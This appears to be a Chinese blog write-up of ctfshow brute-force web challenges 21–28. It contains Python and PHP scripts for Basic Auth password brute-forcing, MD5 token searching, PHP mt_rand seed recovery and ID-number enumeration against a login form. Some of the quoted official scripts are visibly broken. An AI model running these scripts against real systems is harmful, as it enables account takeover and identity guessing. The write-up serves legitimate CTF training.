[wp]ctfshow-web入门-爆破

最新推荐文章于 2024-10-24 22:10:25 发布
最新推荐文章于 2024-10-24 22:10:25 发布
阅读量699 收藏 1
点赞数 1
分类专栏: ctf刷题 文章标签: 前端 python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Yjlay/article/details/125846859
版权

web21 前缀+base64加密爆破

burp
账号密码都写aaa
拦截获得
YWFhOmFhYQ==
进行爆破
在这里插入图片描述
注意这里要取消url-encode
在这里插入图片描述
python
我写的

import requests
import base64

url="http://0a4af429-72ef-40f3-85aa-7a10ff574500.challenge.ctf.show"

f=open("pass.txt","r")
for i in f:
	test=base64.b64encode(('admin:'+i[:-1]).encode()).decode()
	test='Basic '+test
	header={'Authorization':test}
	r=requests.get(url,headers=header)
	if '{' in r.text:
		print(r.text)
		break


f.close()

官方wp脚本:

import time
import requests
import base64

url = 'http://41a801fe-a420-47bc-8593-65c3f26b7efa.chall.ctf.show/index.php'

password = []

with open("1.txt", "r") as f:  
	while True:
	    data = f.readline() 
	    if data:
	    	password.append(data)
	    else:
	      break
	    


for p in password:
	strs = 'admin:'+ p[:-1]
	header={
		'Authorization':'Basic {}'.format(base64.b64encode(strs.encode('utf-8')).decode('utf-8'))
	}
	rep =requests.get(url,headers=header)
	time.sleep(0.2)
	if rep.status_code ==200:
		print(rep.text)
		break

web22

题目坏掉了,网上找wp也没有过去的解法。
看下官方解法
http://phpinfo.me/domain/
看到vip这个
在这里插入图片描述

在这里插入图片描述
我感觉使用字典,用burp或者编写脚本也可以

web23

include('flag.php');
if(isset($_GET['token'])){
    $token = md5($_GET['token']);
    if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
        if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token, 31,1))){
            echo $flag;
        }
    }
}else{
    highlight_file(__FILE__);

}

写脚本
python:
还是太菜了,写的脚本总是报错(把条件看错了报错、除数可能为0报错)

a='abcdefghijklmnopqrstuvwxyzABCDEFGHIZKLMNOPQRSTUVWXYZ1234567890'
#1位
for i1 in a:
	md5new=(hashlib.md5((i1).encode())).digest().hex()
	# print(int(md5new[13:14],16))
	if md5new[1:2]==md5new[14:15] and md5new[14:15]==md5new[17:18] and int(md5new[14:15],16)*3==int(md5new[31:32],16):
		print(il)
		break


#2位
for i1 in a:
	for i2 in a:
		md5new=(hashlib.md5((i1+i2).encode())).digest().hex()
		if md5new[1:2]==md5new[14:15] and md5new[14:15]==md5new[17:18] and md5new[1:2]!='0':
			if int(md5new[14:15],16)*2+int(md5new[17:18],16)/int(md5new[1:2],16)==int(md5new[31:32],16):
				print(i1+i2)
				print(md5new)
				break

php脚本(感觉这种情况,直接复制原题改php脚本比python快且不容易弄错,因为知道2位可以成功,只写了2位爆破)

<?php
$str = 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890';
$n = strlen($str);
for($i1=0;$i1<$n;$i1++){
    for($i2=0;$i2<$n;$i2++){
        $tok=$str[$i1].$str[$i2];
        // echo $tok;
        $token = md5($tok);
        if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
        if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token, 31,1))){
            echo $tok;
            echo "<br>";
            break;
        }
    }
    }
}

运行结果:ZE或3j
看下官方wp

import hashlib
dic = '0123456789qazwsxedcrfvtgbyhnujmikolp'
md5 = hashlib.md5(dic).hexdigest()
for a in dic:
for b in dic:
t = str(a)+str(b)
md5 = hashlib.md5(t).hexdigest()
#print md5
#print md5[1:2]
#print md5[14:15]
#print md5[17:18]
if md5[1:2] == md5[14:15] and md5[14:15]== md5[17:18]:
print t
print md5
print md5[1:2]
print md5[14:15]
print md5[17:18]

没有缩进+满足一个条件就可以了吗???半成品
做24题时发现wp放错地方贴到这里来

<?php
//Firebasky
error_reporting(0);
$a="1234567890zxcvbnmlkjhgfdsaqwertyuiop";//字典
for($i=0;$i<36;$i++){
for($j=0;$j<36;$j++){
$token=$a[$i].$a[$j];
// echo md5($token)."\n";
$token = md5($token);
if(substr($token, 1,1)===substr($token, 14,1) && substr($token,
14,1) ===substr($token, 17,1)){
if((intval(substr($token, 1,1))+intval(substr($token,
14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token,
31,1))){
echo "success"."\n";
echo $a[$i].$a[$j];
exit(0);
}
}
}
} ?
>

web24

if(isset($_GET['r'])){
    $r = $_GET['r'];
    mt_srand(372619038);
    if(intval($r)===intval(mt_rand())){
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
    echo system('cat /proc/version');
}

mt_rand 这个函数,在种子固定的情况下,每次产生的随机数顺序也是固定的。可以参考我buuctf [GWCTF 2019]枯燥的抽奖这题wp里面有详尽的讲解
[wp][GWCTF 2019]枯燥的抽奖
直接本地运行(运行结果1155388967)

<?php
 mt_srand(372619038);
echo intval(mt_rand());

另外,我的wp里也写过随机数的值和php版本相关,这题需要php 7.1+的环境
在这里插入图片描述
看下官方wp
好像给错了解答,这题里面放的是上一题的wp

web25

include("flag.php");
if(isset($_GET['r'])){
    $r = $_GET['r'];
    mt_srand(hexdec(substr(md5($flag), 0,8)));
    $rand = intval($r)-intval(mt_rand());
    if((!$rand)){
        if($_COOKIE['token']==(mt_rand()+mt_rand())){
            echo $flag;
        }
    }else{
        echo $rand;
    }
}else{
    highlight_file(__FILE__);
    echo system('cat /proc/version');
}

由源码可知,当r=0时可以获得$rand(我做的时候是377478015),使用./php_mt_seed 377478015 377478015得到种子(1730906849 1850650948 3462310327)

参考[wp][GWCTF 2019]枯燥的抽奖
在这里插入图片描述
7.1+环境下运行下面程序(这里mt_rand()是每一次是不一样的,所以不能 进行第一次*2就得到mt_rand()+mt_rand() )

<?php
//1730906849 1850650948 3462310327
 mt_srand(1730906849);
echo intval(mt_rand());
echo "<br>";
echo mt_rand()+mt_rand();

在这里插入图片描述

web26

使用burp拦截直接就获得flag,懵逼
官方wp:使用Chrome浏览器抓包,进行暴力破解密码

web27

写了半天的脚本:

import requests
import urllib.parse
import time

url="http://c4a4444b-99d5-46b6-a378-024d52c3b8a9.challenge.ctf.show/info/checkdb.php"

namelist=['高先伊','嵇开梦','郎康焕','元羿谆','祁落兴']

#----------------生日字典---------------------------------------------
days=[]
for i in range(1,10):
	days.append('0'+str(i))
mos=days[:]
add=['10','11','12']
mos=mos+add
# print(mos)
for i in range(10,32):
	days.append(str(i))

# print(days)
shengri=[]
for year in range(1990,2010):
	for mo in mos:
		for day in days:
			shengri.append(str(year)+mo+day)
# print(shengri)

#-----------------------身份证字典---------------------------------
def code(n1,n2):
	shengfen=[]
	for i in shengri:
		shengfen.append(n1+i+n2)
	return shengfen

gao_code=code('621022','5237')
ji_code=code('360730','7653')
lang_code=code('522601','8092')
yuan_code=code('451023','3419')
qi_code=code('410927','5570')

cod=[]
cod.append(gao_code)
cod.append(ji_code)
cod.append(lang_code)
cod.append(yuan_code)
cod.append(qi_code)

#-------------------------爆破--------------------------------------
for i in range(5):
	print(namelist[i])
	for j in cod[i]:
		k=urllib.parse.quote(namelist[i])
		data={'a':namelist[i],'p':j}
		r=requests.post(url,data=data)
		# print(r.text)
		if "error" not in r.text:
			print(j)
			break
		time.sleep(0.06)

得到高先伊
621022199002015237
在这里插入图片描述
使用学号和身份证号码登录成功获得flag
官方wp,这只是生成了个生日字典?

<?php
//621022********5237
$myfile = fopen("zid.txt", "w") or die("Unable to open file!");
for($year=1990;$year<1993;$year++){
for($mon=1;$mon<10;$mon++){
for($day=01;$day<10;$day++)
{
$txt=('621022'.$year.'0'.$mon.'0'.$day.'5237')."\n";
fwrite($myfile, $txt);
}
}
} f
or($year=1990;$year<1993;$year++){
for($mon=1;$mon<10;$mon++){
for($day=10;$day<=31;$day++)
{
$txt=('621022'.$year."0".$mon.$day.'5237')."\n";
fwrite($myfile, $txt);
}
}
} f
or($year=1990;$year<1993;$year++){
for($mon=10;$mon<=12;$mon++){
for($day=10;$day<=31;$day++)
{
$txt=('621022'.$year.$mon.$day.'5237')."\n";
fwrite($myfile, $txt);
}
}
} f
or($year=1990;$year<1993;$year++){
for($mon=10;$mon<=12;$mon++){
for($day=01;$day<10;$day++)
{
$txt=('621022'.$year.$mon."0".$day.'5237')."\n";
fwrite($myfile, $txt);
}
}
} f
close($myfile);

补充一个burp的做法
我使用火狐不行得使用谷歌浏览器抓包
在这里插入图片描述
在这里插入图片描述
总结,这种爆破题还是burp快

补充2,网上看到其他师傅有用身份证的有效性进行爆破

写脚本爆破出所有可能的身份证号当作字典

第十八位数字(校验码)的计算方法为:
 * 1.将前面的身份证号码17位数分别乘以不同的系数。从第一位到第十七位的系数分别为:7 9 10 5 8 4 2 1 6 3 7 9 10 5 8 4 2
 * 2.将这17位数字和系数相乘的结果相加与11进行相除。
 * 3.余数0 1 2 3 4 5 6 7 8 9 10这11个数字,其分别对应的最后一位身份证的号码为1 0 X 9 8 7 6 5 4 3 2。
 * 4.例如 余数为 0 , 则身份证最后一位就是1
 *       余数为 2 , 则身份证最后一位就是罗马数字X
 *       余数为 10 , 则身份证最后一位就是2

<?php
$a='621022';
$b='5237';
 
function youxiao($sfz){
	$sum=0;
	$xym=array(7,9,10,5,8,4,2,1,6,3,7,9,10,5,8,4,2);
    //将数字变量sfz里的所有字符分割在str里
	$sfz=str_split($sfz,1);
	for($i=0;$i<17;$i++){
		$sum+=$xym[$i]*$sfz[$i];
	}
	if($sum%11==5){
		return true;
	}
	else{
		return false;
	}
}
 
for($year=1990;$year<=2000;$year++){
	for($month=1;$month<=12;$month++){
		if($month<10){
			$month='0'.$month;
		}
		for($day=1;$day<=31;$day++){
			if($day<10){
				$day='0'.$day;
			}
			$birthday=$year.$month.$day;
			$sfz=$a.$birthday.$b;
			//利用身份证最后一位校验位进行身份证号有效性的判断
			if(youxiao($sfz)){
				echo $sfz.'<br>';
			}
		}
	}
}
?>

参考:https://blog.youkuaiyun.com/HkD01L/article/details/125381974

web28

刚开始爆破没成功,看了官方的hint
“通过暴力破解目录/0-100/0-100/看返回数据包
爆破的时候去掉2.txt 仅仅爆破目录即可”
进行暴破,漫长的过程最后payload“/72/20/”

CTFshow web入门——爆破
小元砸的博客
01-24 5160
web 21 一.涉及工具: burp suit burp suit 使用教程 二.解题思路: 1.随便输一个密码和用户名抓包一下 2.base64解密一下发现账号密码的形式为 账号:密码,根据题目提示我们用自定义迭代器爆破,使用方法参考:Custom iterator的使用 注:下面爆破用的字典是题目所提供的 3.爆破出结果 web 22 一.涉及知识点: 子域名爆破(此题不能爆破出来)在线子域名爆破 二.解题思路: 直接点开View Hint(提示)即可得到答案 web 23 一.涉及工具: p
ctfshow web入门--爆破
最新发布
2402_87078084的博客
02-22 107
随便输入账号密码进行登录,抓了半天都没有抓到有用户名和密码的包,最后还是用的bp的内嵌浏览器才抓到。然后进行爆破,这里我们采用 Custom iterator进行爆破,具体操作可参考。疑似base64编码,所以解码试试看,发现是我们输入的账号密码,并且是。点击连接进去就是登录页面,但并没有给账号密码,所以直接抓包看一下。我们再使用爆破成功的账号密码,就能得到flag。提示中给了一个压缩包,下载后发现是一个字典。状态码为200即为爆破成功。
CTFSHOW WEB入门——爆破
Chur的博客
09-16 1151
WEB入门——爆破 BP
ctfshow 爆破(web入门
..
12-08 3631
web21 打开题目显示要登陆密码 随便输入123,123抓个包试试,发现Authorization:有一串字母,拿去base64解码试试 发现是我们刚输入的账号密码 所以爆破点有了,发送到测试器 清除§,然后在爆破点加上§ 接着在payload这里直接载入从题目下载的字典 接着在有效负载处理那里添加前缀 再添加一个base64编码,同时取消勾选下面的url编码字符 接着到选项这里,调一下请求引擎,线程数建议别调太大,我前面调了200试了几次...
CTFshow web入门 爆破
m0_64180167的博客
07-27 767
输入账号密码 抓包 发现下面存在一个base64编码我输入的是 123 123发现就是base加密账号 密码那我们怎么通过intruder模块 自动变为 base64呢然后去payload------>custom iterator(自定义迭代器)位置1导入admin因为是 账号:密码 这个组合 所以位置2 选择 :位置3再一次导入字典选择编码 我们在下面的进行编码选择还有记得取消自动url编码然后直接开始就可以了。
渗透测试-ctfshow 爆破(web入门
保持微笑的博客
12-29 5018
渗透测试-ctfshow 爆破(web入门
ctfshow-web入门-爆破wp
m0_53567065的博客
11-01 1246
ctfshow-web入门-爆破wp
ctfshow-web入门-信息搜集wp
m0_53567065的博客
10-31 756
ctfshow-web入门-信息收集wp
CTFshow-web入门爆破(21-28)
i_kei的博客
12-13 8075
web21 用burp抓包 输入的账户名和密码被base64加密了,用burp自带解密发现账户名和密码之间用冒号隔开了,接下来构造payload 分别选中账户名和密码,我这里选择把冒号放到了账户名那里,放到密码也可以,只是一会儿加前缀和后缀的区别 payload1(账户名):先导入题目提供的字典,然后加后缀冒号,再用base64加密 payload2(密码):导入提供的字典,base64加密 payload1和payload2都需要取消勾选 构造完之后,发现需要爆破的条目数太大了,经过群里大佬
CTFShow-web入门WriteUp(长期更新)
子推的Blog
03-26 753
web21 下载zip文件是后台密码字典,用户名猜测admin,先进行抓包 没有发现我们传输的参数,但是HTTP请求头里面有这样的参数 解码之后发现这是我们传输的参数,所以开始爆破 因为编码前几位是admin:的base64,所以我们只需要把密码所在段设置为变量即可 然后对payload进行base64加密,进行爆破 这里有点需要注意,我们要关闭Payload Encoding,因为我们base64加密结果可能会存在=或者==,payload encoding会将=进行编码 或者写python
CTFShow-Web篇详细wp(持续更新中ing)_ctfshow web wp
2401_84297944的博客
04-28 469
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料。
ctfshow web入门 爆破
weixin_56023251的博客
07-13 570
bp抓包,设置爆破点,导入字典啥的设置好就开始爆破字典很短很容易拿到flag在线工具 https://phpinfo.me/domain爆破一下ctf.show的子域名,可以看到有好几个子域名,挨个查看源码,在vip.ctf.show源码中找到flag法一 token被md5加密,第一个条件:它的第一位=第十四位=第十七位,第二个条件:(第一位+第十四位+第十七位)/第一位=第三十一位编写php代码对token进行爆破 phpstudy本地搭建环境访问php文件得到token值访问 ?token=
CTFshow-web入门-爆破
qq_63575829的博客
04-18 491
CTFshow-web入门-爆破
ctfshow--web入门爆破
2301_81133001的博客
10-24 2477
暴力破解实际就是疯狂的输入密码进行尝试登录,针对有的人喜欢用一些个人信息当做密码,有的人喜欢用一些很简单的低强度密码,我们就可以针对性的生成一个字典,用脚本或者工具挨个去尝试登录。
ctfshow-web入门——爆破web21-web28)
m0_62905745的博客
04-14 2143
本篇文章是ctfshowweb入门部分的爆破wpweb21-web 28),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习吖
CTFshow Web入门 爆破
m0_62905261的博客
10-23 414
CTFshow Web入门 爆破
CTFshow web入门爆破web21-web28)
小白的博客
05-10 818
爆破在理解题目意思以及正确构造爆破payload内容还是很简单的。
ctfshow-__萌新隐写
09-14
根据引用中提到的内容,CTFShow "萌心区"WP详解(上)涉及了一些关于萌新认证的内容,其中包括了密码、隐写和杂项等方面的题目。而引用中提到,下载的文件是一个word文件,里面包含了一张图,并且提示说找到了FLAG。而引用中提到,萌新隐写题目可能是纯签到题,可以在公告中找到或者输入萌新码。根据这些信息,我们可以得出结论,ctfshow-__萌新隐写也是CTFShow "萌心区"WP详解(上)中关于隐写的一道题目。 请注意,我无法提供具体的题目内容和解答,因为您没有提供更多细节。如果您需要更详细的答案,请提供更多相关的信息,我将尽力帮助您解答。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值